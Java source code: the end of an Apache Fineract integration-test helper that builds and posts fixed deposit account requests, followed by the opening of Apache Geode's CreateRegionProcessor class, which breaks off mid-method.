interestCalculationDaysInYearType = DAYS_365; private final boolean preClosurePenalApplicable = true; private final boolean isActiveChart = true; private final String currencyCode = USD; private String depositPeriod = "14"; private final String depositPeriodFrequencyId = MONTHS; private String submittedOnDate = ""; private String savingsId = null; private boolean transferInterest = false; private Integer maturityInstructionId; private List<HashMap<String, String>> charges; // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public String build(final String clientId, final String productId, final String penalInterestType) { final HashMap<String, Object> map = new HashMap<>(); map.put("productId", productId); map.put("clientId", clientId); map.put("interestCalculationDaysInYearType", this.interestCalculationDaysInYearType); map.put("locale", LOCALE); map.put("dateFormat", "dd MMMM yyyy"); map.put("monthDayFormat", "dd MMM"); map.put("interestCalculationType", this.interestCalculationType); map.put("interestCompoundingPeriodType", this.interestCompoundingPeriodType); map.put("interestPostingPeriodType", this.interestPostingPeriodType); map.put("lockinPeriodFrequency", this.lockinPeriodFrequency); map.put("lockinPeriodFrequencyType", this.lockingPeriodFrequencyType); map.put("preClosurePenalApplicable", "true"); map.put("minDepositTermTypeId", this.minDepositTermTypeId); map.put("minDepositTerm", this.minDepositTerm); map.put("maxDepositTermTypeId", this.maxDepositTermTypeId); map.put("maxDepositTerm", this.maxDepositTerm); map.put("preClosurePenalApplicable", this.preClosurePenalApplicable); map.put("inMultiplesOfDepositTerm", this.inMultiplesOfDepositTerm); map.put("inMultiplesOfDepositTermTypeId", this.inMultiplesOfDepositTermTypeId); map.put("preClosurePenalInterest", this.preClosurePenalInterest); map.put("preClosurePenalInterestOnTypeId", penalInterestType); map.put("depositAmount", getDepositAmount()); map.put("depositPeriod", this.depositPeriod); map.put("depositPeriodFrequencyId", this.depositPeriodFrequencyId); map.put("submittedOnDate", this.submittedOnDate); map.put("linkAccountId", savingsId); map.put("transferInterestToSavings", transferInterest); map.put("maturityInstructionId", maturityInstructionId); map.put("charges", charges); String fixedDepositAccountJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountJson); return fixedDepositAccountJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static Integer applyFixedDepositApplicationGetId(final String fixedDepositAccountAsJson, final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { LOG.info("--------------------- APPLYING FOR FIXED DEPOSIT ACCOUNT ------------------------"); return Utils.performServerPost(requestSpec, responseSpec, APPLY_FIXED_DEPOSIT_ACCOUNT_URL, fixedDepositAccountAsJson, CommonConstants.RESPONSE_RESOURCE_ID); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static String applyFixedDepositApplication(final String fixedDepositAccountAsJson, final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { LOG.info("--------------------- APPLYING FOR FIXED DEPOSIT ACCOUNT ------------------------"); return Utils.performServerPost(requestSpec, responseSpec, APPLY_FIXED_DEPOSIT_ACCOUNT_URL, fixedDepositAccountAsJson); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static HashMap getFixedDepositAccountById(final RequestSpecification requestSpec, final ResponseSpecification responseSpec, final Integer accountID) { final String GET_FIXED_DEPOSIT_BY_ID_URL = FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER; LOG.info("------------------------ RETRIEVING FIXED DEPOSIT ACCOUNT BY ID -------------------------"); return Utils.performServerGet(requestSpec, responseSpec, GET_FIXED_DEPOSIT_BY_ID_URL, ""); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap getFixedDepositSummary(final Integer accountID) { return getFixedDepositDetails(accountID, "summary"); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap getFixedDepositDetails(final Integer accountID) { return getFixedDepositDetails(accountID, ""); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private HashMap getFixedDepositDetails(final Integer accountID, final String jsonAttributeToGetBack) { final String URL = FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER; final HashMap response = Utils.performServerGet(requestSpec, responseSpec, URL, jsonAttributeToGetBack); return response; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static Float getInterestRate(ArrayList<ArrayList<HashMap>> interestSlabData, Integer depositPeriod) { Float annualInterestRate = 0.0f; for (Integer slabIndex = 0; slabIndex < interestSlabData.get(0).size(); slabIndex++) { Integer fromPeriod = (Integer) interestSlabData.get(0).get(slabIndex).get("fromPeriod"); Integer toPeriod = (Integer) interestSlabData.get(0).get(slabIndex).get("toPeriod"); if (depositPeriod >= fromPeriod && depositPeriod <= toPeriod) { annualInterestRate = (Float) interestSlabData.get(0).get(slabIndex).get("annualInterestRate"); break; } } return annualInterestRate; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static Float getPrincipalAfterCompoundingInterest(Calendar currentDate, Float principal, Integer depositPeriod, double interestPerDay, Integer compoundingInterval, Integer postingInterval) { Float totalInterest = 0.0f; Float interestEarned = 0.0f; for (int i = 1; i <= depositPeriod; i++) { Integer daysInMonth = currentDate.getActualMaximum(Calendar.DATE); for (int j = 0; j < daysInMonth; j++) { interestEarned = (float) (principal * interestPerDay); totalInterest += interestEarned; if (compoundingInterval == 0) { principal += interestEarned; } } if ((i % postingInterval) == 0 || i == depositPeriod) { if (compoundingInterval != 0) { principal += totalInterest; } totalInterest = 0.0f; LOG.info("{}", principal.toString()); } currentDate.add(Calendar.MONTH, 1); interestEarned = 0.0f; } return principal; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap updateFixedDepositAccount(final String clientID, final String productID, final String accountID, final String validFrom, final String validTo, final String penalInterestType, final String submittedOnDate) { final String fixedDepositApplicationJSON = new FixedDepositAccountHelper(this.requestSpec, this.responseSpec) // .withSubmittedOnDate(submittedOnDate) // .build(clientID, productID, penalInterestType); return Utils.performServerPut(this.requestSpec, this.responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER, fixedDepositApplicationJSON, CommonConstants.RESPONSE_CHANGES); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap updateInterestCalculationConfigForFixedDeposit(final String clientID, final String productID, final String accountID, final String submittedOnDate, final String validFrom, final String validTo, final String numberOfDaysPerYear, final String penalInterestType, final String interestCalculationType, final String interestCompoundingPeriodType, final String interestPostingPeriodType) { final String fixedDepositApplicationJSON = new FixedDepositAccountHelper(this.requestSpec, this.responseSpec) // .withSubmittedOnDate(submittedOnDate) // .withNumberOfDaysPerYear(numberOfDaysPerYear) // .withInterestCalculationPeriodType(interestCalculationType) // .withInterestCompoundingPeriodType(interestCompoundingPeriodType) // .withInterestPostingPeriodType(interestPostingPeriodType) // .build(clientID, productID, penalInterestType); return Utils.performServerPut(this.requestSpec, this.responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "/" + accountID + "?" + Utils.TENANT_IDENTIFIER, fixedDepositApplicationJSON, CommonConstants.RESPONSE_CHANGES); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap approveFixedDeposit(final Integer fixedDepositAccountID, final String approvedOnDate) { LOG.info("--------------------------------- APPROVING FIXED DEPOSIT APPLICATION ------------------------------------"); return performFixedDepositApplicationActions(createFixedDepositOperationURL(APPROVE_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getApproveFixedDepositAccountAsJSON(approvedOnDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap undoApproval(final Integer fixedDepositAccountID) { LOG.info("--------------------------------- UNDO APPROVING FIXED DEPOSIT APPLICATION -------------------------------"); final String undoBodyJson = "{'note':'UNDO APPROVAL'}"; return performFixedDepositApplicationActions( createFixedDepositOperationURL(UNDO_APPROVAL_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), undoBodyJson); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap rejectApplication(final Integer fixedDepositAccountID, final String rejectedOnDate) { LOG.info("--------------------------------- REJECT FIXED DEPOSIT APPLICATION -------------------------------"); return performFixedDepositApplicationActions(createFixedDepositOperationURL(REJECT_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getRejectedFixedDepositAsJSON(rejectedOnDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap withdrawApplication(final Integer fixedDepositAccountID, final String withdrawApplicationOnDate) { LOG.info("--------------------------------- Withdraw FIXED DEPOSIT APPLICATION -------------------------------"); return performFixedDepositApplicationActions( createFixedDepositOperationURL(WITHDRAWN_BY_CLIENT_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getWithdrawnFixedDepositAccountAsJSON(withdrawApplicationOnDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap activateFixedDeposit(final Integer fixedDepositAccountID, final String activationDate) { LOG.info("---------------------------------- ACTIVATING FIXED DEPOSIT APPLICATION ----------------------------------"); return performFixedDepositApplicationActions(createFixedDepositOperationURL(ACTIVATE_FIXED_DEPOSIT_COMMAND, fixedDepositAccountID), getActivatedFixedDepositAccountAsJSON(activationDate)); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Object deleteFixedDepositApplication(final Integer fixedDepositAccountID, final String jsonAttributeToGetBack) { LOG.info("---------------------------------- DELETE FIXED DEPOSIT APPLICATION ----------------------------------"); return Utils.performServerDelete(this.requestSpec, this.responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "/" + fixedDepositAccountID + "?" + Utils.TENANT_IDENTIFIER, jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Integer calculateInterestForFixedDeposit(final Integer fixedDepositAccountId) { LOG.info("--------------------------------- CALCULATING INTEREST FOR FIXED DEPOSIT --------------------------------"); return (Integer) performFixedDepositActions( createFixedDepositCalculateInterestURL(CALCULATE_INTEREST_FIXED_DEPOSIT_COMMAND, fixedDepositAccountId), getCalculatedInterestForFixedDepositApplicationAsJSON(), CommonConstants.RESPONSE_RESOURCE_ID); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Integer postInterestForFixedDeposit(final Integer fixedDepositAccountId) { LOG.info("--------------------------------- POST INTEREST FOR FIXED DEPOSIT --------------------------------"); return (Integer) performFixedDepositActions( createFixedDepositCalculateInterestURL(POST_INTEREST_FIXED_DEPOSIT_COMMAND, fixedDepositAccountId), getCalculatedInterestForFixedDepositApplicationAsJSON(), CommonConstants.RESPONSE_RESOURCE_ID); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public HashMap calculatePrematureAmountForFixedDeposit(final Integer fixedDepositAccountId, final String closedOnDate) { LOG.info("--------------------- CALCULATING PREMATURE AMOUNT FOR FIXED DEPOSIT ----------------------------"); return (HashMap) performFixedDepositActions( createFixedDepositCalculateInterestURL(CALCULATE_PREMATURE_AMOUNT_COMMAND, fixedDepositAccountId), getCalculatedPrematureAmountForFixedDepositAccountAsJSON(closedOnDate), ""); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Object prematureCloseForFixedDeposit(final Integer fixedDepositAccountId, final String closedOnDate, final String closureType, final Integer toSavingsId, final String jsonAttributeToGetBack) { LOG.info("--------------------- PREMATURE CLOSE FOR FIXED DEPOSIT ----------------------------"); return performFixedDepositActions(createFixedDepositCalculateInterestURL(PREMATURE_CLOSE_COMMAND, fixedDepositAccountId), getPrematureCloseForFixedDepositAccountAsJSON(closedOnDate, closureType, toSavingsId), jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public Object closeForFixedDeposit(final Integer fixedDepositAccountId, final String closedOnDate, final String closureType, final Integer toSavingsId, final String jsonAttributeToGetBack) { LOG.info("--------------------- CLOSE FOR FIXED DEPOSIT ----------------------------"); return performFixedDepositActions(createFixedDepositCalculateInterestURL(CLOSE_FIXED_DEPOSIT_COMMAND, fixedDepositAccountId), getPrematureCloseForFixedDepositAccountAsJSON(closedOnDate, closureType, toSavingsId), jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getApproveFixedDepositAccountAsJSON(final String approvedOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("approvedOnDate", approvedOnDate); map.put("note", "Approval NOTE"); String fixedDepositAccountApproveJson = new Gson().toJson(map); LOG.info(fixedDepositAccountApproveJson); return fixedDepositAccountApproveJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getRejectedFixedDepositAsJSON(final String rejectedOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("rejectedOnDate", rejectedOnDate); map.put("note", "Rejected NOTE"); String fixedDepositAccountJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountJson); return fixedDepositAccountJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getWithdrawnFixedDepositAccountAsJSON(final String withdrawnApplicationOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("withdrawnOnDate", withdrawnApplicationOnDate); map.put("note", "Withdraw NOTE"); String fixedDepositAccountJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountJson); return fixedDepositAccountJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getActivatedFixedDepositAccountAsJSON(final String activationDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("activatedOnDate", activationDate); String fixedDepositAccountActivateJson = new Gson().toJson(map); LOG.info("{}", fixedDepositAccountActivateJson); return fixedDepositAccountActivateJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getCalculatedInterestForFixedDepositApplicationAsJSON() { final HashMap<String, String> map = new HashMap<>(); String fixedDepositAccountCalculatedInterestJson = new Gson().toJson(map); LOG.info(fixedDepositAccountCalculatedInterestJson); return fixedDepositAccountCalculatedInterestJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getCalculatedPrematureAmountForFixedDepositAccountAsJSON(final String closedOnDate) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("closedOnDate", closedOnDate); String fixedDepositAccountPrematureClosureJson = new Gson().toJson(map); LOG.info(fixedDepositAccountPrematureClosureJson); return fixedDepositAccountPrematureClosureJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String getPrematureCloseForFixedDepositAccountAsJSON(final String closedOnDate, final String closureType, final Integer toSavingsId) { final HashMap<String, Object> map = new HashMap<>(); map.put("locale", CommonConstants.LOCALE); map.put("dateFormat", CommonConstants.DATE_FORMAT); map.put("closedOnDate", closedOnDate); map.put("onAccountClosureId", closureType); if (toSavingsId != null) { map.put("toSavingsAccountId", toSavingsId); map.put("transferDescription", "Transferring To Savings Account"); } String fixedDepositAccountPrematureCloseJson = new Gson().toJson(map); LOG.info(fixedDepositAccountPrematureCloseJson); return fixedDepositAccountPrematureCloseJson; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String createFixedDepositOperationURL(final String command, final Integer fixedDepositAccountID) { return FIXED_DEPOSIT_ACCOUNT_URL + "/" + fixedDepositAccountID + "?command=" + command + "&" + Utils.TENANT_IDENTIFIER; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private Object performFixedDepositActions(final String postURLForFixedDeposit, final String jsonToBeSent, final String jsonAttributeToGetBack) { return Utils.performServerPost(this.requestSpec, this.responseSpec, postURLForFixedDeposit, jsonToBeSent, jsonAttributeToGetBack); } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private HashMap performFixedDepositApplicationActions(final String postURLForFixedDepositAction, final String jsonToBeSent) { HashMap status = null; final HashMap response = Utils.performServerPost(this.requestSpec, this.responseSpec, postURLForFixedDepositAction, jsonToBeSent, CommonConstants.RESPONSE_CHANGES); if (response != null) { status = (HashMap) response.get("status"); } return status; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) private String createFixedDepositCalculateInterestURL(final String command, final Integer fixedDepositAccountID) { return FIXED_DEPOSIT_ACCOUNT_URL + "/" + fixedDepositAccountID + "?command=" + command + "&" + Utils.TENANT_IDENTIFIER; } // TODO: Rewrite to use fineract-client instead! // Example: org.apache.fineract.integrationtests.common.loans.LoanTransactionHelper.disburseLoan(java.lang.Long, // org.apache.fineract.client.models.PostLoansLoanIdRequest) @Deprecated(forRemoval = true) public static ArrayList retrieveAllFixedDepositAccounts(final RequestSpecification requestSpec, final ResponseSpecification responseSpec) { LOG.info("-------------------- RETRIEVING ALL FIXED DEPOSIT ACCOUNTS ---------------------"); final ArrayList response = Utils.performServerGet(requestSpec, responseSpec, FIXED_DEPOSIT_ACCOUNT_URL + "?" + Utils.TENANT_IDENTIFIER, ""); return response; } public FixedDepositAccountHelper withSubmittedOnDate(final String fixedDepositApplicationSubmittedDate) { this.submittedOnDate = fixedDepositApplicationSubmittedDate; return this; } public FixedDepositAccountHelper withNumberOfDaysPerYear(final String numberOfDaysPerYearTypeId) { this.interestCalculationDaysInYearType = numberOfDaysPerYearTypeId; return this; } public FixedDepositAccountHelper withInterestCalculationPeriodType(final String interestCalculationTypeId) { this.interestCalculationType = interestCalculationTypeId; return this; } public FixedDepositAccountHelper withInterestCompoundingPeriodType(final String interestCompoundingPeriodTypeId) { this.interestCompoundingPeriodType = interestCompoundingPeriodTypeId; return this; } public FixedDepositAccountHelper withInterestPostingPeriodType(final String interestPostingPeriodTypeId) { this.interestPostingPeriodType = interestPostingPeriodTypeId; return this; } public FixedDepositAccountHelper withSavings(final String savingsId) { this.savingsId = savingsId; return this; } public FixedDepositAccountHelper transferInterest(final boolean transferInterest) { this.transferInterest = transferInterest; return this; } public FixedDepositAccountHelper withLockinPeriodFrequency(final String lockingPeriodFrequencyType, final String lockinPeriodFrequency) { this.lockingPeriodFrequencyType = lockingPeriodFrequencyType; this.lockinPeriodFrequency = lockinPeriodFrequency; return this; } public FixedDepositAccountHelper withDepositPeriod(final String depositPeriod) { this.depositPeriod = depositPeriod; return this; } public FixedDepositAccountHelper withDepositAmount(final String depositAmount) { this.newDepositAmount = depositAmount; return this; } private String getDepositAmount() { if (this.newDepositAmount == null) { return DEPOSIT_AMOUNT; } return this.newDepositAmount; } public FixedDepositAccountHelper withMaturityInstructionId(Integer maturityInstructionId) { this.maturityInstructionId = maturityInstructionId; return this; } public FixedDepositAccountHelper withCharges(List<HashMap<String, String>> charges) { this.charges = charges; return this; } }
apache/geode
36,020
geode-core/src/main/java/org/apache/geode/internal/cache/CreateRegionProcessor.java
/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.internal.cache; import static org.apache.geode.internal.cache.LocalRegion.InitializationLevel.ANY_INIT; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import org.apache.logging.log4j.Logger; import org.apache.geode.CancelException; import org.apache.geode.DataSerializer; import org.apache.geode.SystemFailure; import org.apache.geode.cache.DynamicRegionFactory; import org.apache.geode.cache.PartitionAttributes; import org.apache.geode.cache.RegionDestroyedException; import org.apache.geode.cache.Scope; import org.apache.geode.distributed.DistributedMember; import org.apache.geode.distributed.internal.ClusterDistributionManager; import org.apache.geode.distributed.internal.DistributionAdvisee; import org.apache.geode.distributed.internal.DistributionAdvisor; import org.apache.geode.distributed.internal.DistributionMessage; import org.apache.geode.distributed.internal.HighPriorityDistributionMessage; import org.apache.geode.distributed.internal.InternalDistributedSystem; import org.apache.geode.distributed.internal.MessageWithReply; import org.apache.geode.distributed.internal.ReplyException; import org.apache.geode.distributed.internal.ReplyMessage; import org.apache.geode.distributed.internal.ReplyProcessor21; import org.apache.geode.distributed.internal.membership.InternalDistributedMember; import org.apache.geode.internal.Assert; import org.apache.geode.internal.InternalDataSerializer; import org.apache.geode.internal.cache.CacheDistributionAdvisor.CacheProfile; import org.apache.geode.internal.cache.CacheDistributionAdvisor.InitialImageAdvice; import org.apache.geode.internal.cache.LocalRegion.InitializationLevel; import org.apache.geode.internal.cache.event.EventSequenceNumberHolder; import org.apache.geode.internal.cache.ha.ThreadIdentifier; import org.apache.geode.internal.cache.partitioned.Bucket; import org.apache.geode.internal.cache.partitioned.PRLocallyDestroyedException; import org.apache.geode.internal.cache.partitioned.RegionAdvisor; import org.apache.geode.internal.cache.partitioned.RegionAdvisor.PartitionProfile; import org.apache.geode.internal.cache.persistence.PersistentMemberID; import org.apache.geode.internal.serialization.DeserializationContext; import org.apache.geode.internal.serialization.SerializationContext; import org.apache.geode.logging.internal.log4j.api.LogService; /** * This message processor handles creation and initial exchange of * org.apache.geode.internal.cache.CacheDistributionAdvisor.Profiles. It represents creation of a * {@link CacheDistributionAdvisee}. Name remains CreateRegion to avoid merge conflicts. */ public class CreateRegionProcessor implements ProfileExchangeProcessor { private static final Logger logger = LogService.getLogger(); protected CacheDistributionAdvisee newRegion; /** Creates a new instance of CreateRegionProcessor */ public CreateRegionProcessor(CacheDistributionAdvisee newRegion) { this.newRegion = newRegion; } /** this method tells other members that the region is being created */ @Override public void initializeRegion() { InternalDistributedSystem system = newRegion.getSystem(); // try 5 times, see CreateRegionMessage#skipDuringInitialization for (int retry = 0; retry < 5; retry++) { Set recps = getRecipients(); if (logger.isDebugEnabled()) { logger.debug("Creating region {}", newRegion); } if (recps.isEmpty()) { if (logger.isDebugEnabled()) { logger.debug("CreateRegionProcessor.initializeRegion, no recipients, msg not sent"); } newRegion.getDistributionAdvisor().setInitialized(); ((LocalRegion) newRegion).getEventTracker().setInitialized(); return; } CreateRegionReplyProcessor replyProc = new CreateRegionReplyProcessor(recps); newRegion.registerCreateRegionReplyProcessor(replyProc); boolean useMcast = false; // multicast is disabled for this message for now CreateRegionMessage msg = getCreateRegionMessage(recps, replyProc, useMcast); // since PR buckets can be created during cache entry operations, enable // severe alert processing if we're creating one of them if (((LocalRegion) newRegion).isUsedForPartitionedRegionBucket()) { replyProc.enableSevereAlertProcessing(); msg.severeAlertCompatible = true; } newRegion.getDistributionManager().putOutgoing(msg); // this was in a while() loop, which is incorrect use of a reply processor. // Reply procs are deregistered when they return from waitForReplies try { // Don't allow a region to be created if the distributed system is // disconnecting newRegion.getCache().getCancelCriterion().checkCancelInProgress(null); // This isn't right. We should disable region creation in general, not just // the remote case here... // // Similarly, don't allow new regions to be created if the cache is closing try { replyProc.waitForRepliesUninterruptibly(); if (!replyProc.needRetry()) { break; } } catch (ReplyException e) { Throwable t = e.getCause(); if (t instanceof IllegalStateException) { // region is incompatible with region in another cache throw (IllegalStateException) t; } e.handleCause(); break; } } finally { replyProc.cleanup(); ((LocalRegion) newRegion).getEventTracker().setInitialized(); if (((LocalRegion) newRegion).isUsedForPartitionedRegionBucket()) { if (logger.isDebugEnabled()) { logger.debug("initialized bucket event tracker: {}", ((LocalRegion) newRegion).getEventTracker()); } } } } // while // tell advisor that it has been initialized since a profile exchange occurred newRegion.getDistributionAdvisor().setInitialized(); } protected Set getRecipients() { DistributionAdvisee parent = newRegion.getParentAdvisee(); Set recps = null; if (parent == null) { // root region, all recipients InternalDistributedSystem system = newRegion.getSystem(); recps = system.getDistributionManager().getOtherDistributionManagerIds(); } else { // get recipients that have the parent region defined as distributed. recps = getAdvice(); } return recps; } @Override public InitialImageAdvice getInitialImageAdvice(InitialImageAdvice previousAdvice) { return newRegion.getCacheDistributionAdvisor().adviseInitialImage(previousAdvice); } private Set getAdvice() { if (newRegion instanceof BucketRegion) { return ((Bucket) newRegion).getBucketAdvisor().adviseProfileExchange(); } else { DistributionAdvisee rgn = newRegion.getParentAdvisee(); DistributionAdvisor advisor = 